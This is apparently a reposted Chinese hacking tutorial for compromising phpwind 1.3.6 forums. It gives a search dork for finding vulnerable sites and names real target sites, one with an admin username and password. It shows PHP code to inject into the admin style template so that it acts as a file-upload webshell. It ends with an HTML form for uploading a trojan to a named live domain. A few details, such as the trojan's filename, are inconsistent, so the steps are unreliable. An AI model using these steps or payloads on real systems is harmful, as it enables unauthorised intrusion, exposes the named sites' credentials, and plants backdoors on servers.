phpwind1.3.6论坛入侵|phpwind破解后台帐号管理密码
phpwind1.3.6论坛入侵|phpwind破解后台帐号管理密码
废话少说只说重点:
(今天和浪子聊天想起来的05年的漏洞)
工具:
下载地址第一步:在google上搜索 "inurl:phpwind board v1.3.6"参考地址:
http://202.113.13.85/webclass/tjuchem/forum/
www.sccph.net/club/
http://bbs.hsfz.org/admin.php 用户admin 密码hacker

第二步:搞到密码进入后台
进入后台,找到“风格模板设置”
把里面的代码换成如下代码:<style type='text/css'></style>
<!--
EOT;
?>-->
<?php
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile]
[name]);?>
?>
<!--
<?php
print <<<EOT
-->
<style type='text/css'>
TABLE { BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM:
2px}
SELECT { FONT-SIZE: 9pt; COLOR: #000000; BACKGROUND-
COLOR:
$forumcolorone}
A { TEXT-DECORATION: none;}
a:hover{ text-decoration: underline;}
BODY {font-family:Verdana;FONT-SIZE: 12px;color:
#000000;background:
#ffffff;}
textarea,input,object { font-family: Tahoma, Verdana;
font-size:
12px; color: #000000;font-weight: normal; background-
color:
$forumcolorone }
TD { BORDER-RIGHT: 1px; BORDER-TOP: 0px; FONT-SIZE: 9pt;
COLOR:
#000000;}
.head { color: #ffffff;background: #6699CC;padding: 5px;}
.f_one {background: $forumcolorone;}
.f_two {background: $forumcolortwo;}
.t_one {background: $threadcolorone;}
.t_two {background: $threadcolortwo;}
.cbg { color:#000000;background: #D1DCEB;}
.smalltxt {font-family: Tahoma, Verdana; font-size:
8pt;color:
#000000;}
.table { color:#000000;}
.cfont { color:#ffffff; }
.fnamecolor { color:#003366;}
.bold {font-weight:bold;}
.headurl { color:#ffffff;}
.index_font{color: #3A4F6C;background-color:#D1DCEB;
font-
weight:bold;padding: 5px;}
.tpc_title { font-size: 12px;}
.tpc_content { font-size: 12px;}
.i_table {BORDER-RIGHT: $tablecolor 1px solid; BORDER-
TOP: $tablecolor
1px solid; BORDER-LEFT: $tablecolor 1px solid; BORDER-
BOTTOM:
$tablecolor 1px solid;}
</style>
保存后,木马地址为当前目录下的faq.php
第三步:在本机用如下表单进行提交:
<form ENCTYPE="multipart/form-data" ACTION="http://www.918x.cn/fap.php"
METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
上传成功后的木马存在论坛目录下
直接访问就行!
{keywords:phpwind1.3.6论坛入侵|phpwind破解后台帐号管理密码}是本站 (追求卓越,资源共享) 中一篇关于keywords:phpwind1.3.6论坛入侵|phpwind破解后台帐号管理密码最经典的文章,欢迎您阅读和评论,您可以从百度搜索phpwind1.3.6论坛入侵|phpwind破解后台帐号管理密码其它信息,也可以从google中查询更多phpwind1.3.6论坛入侵|phpwind破解后台帐号管理密码的相关信息。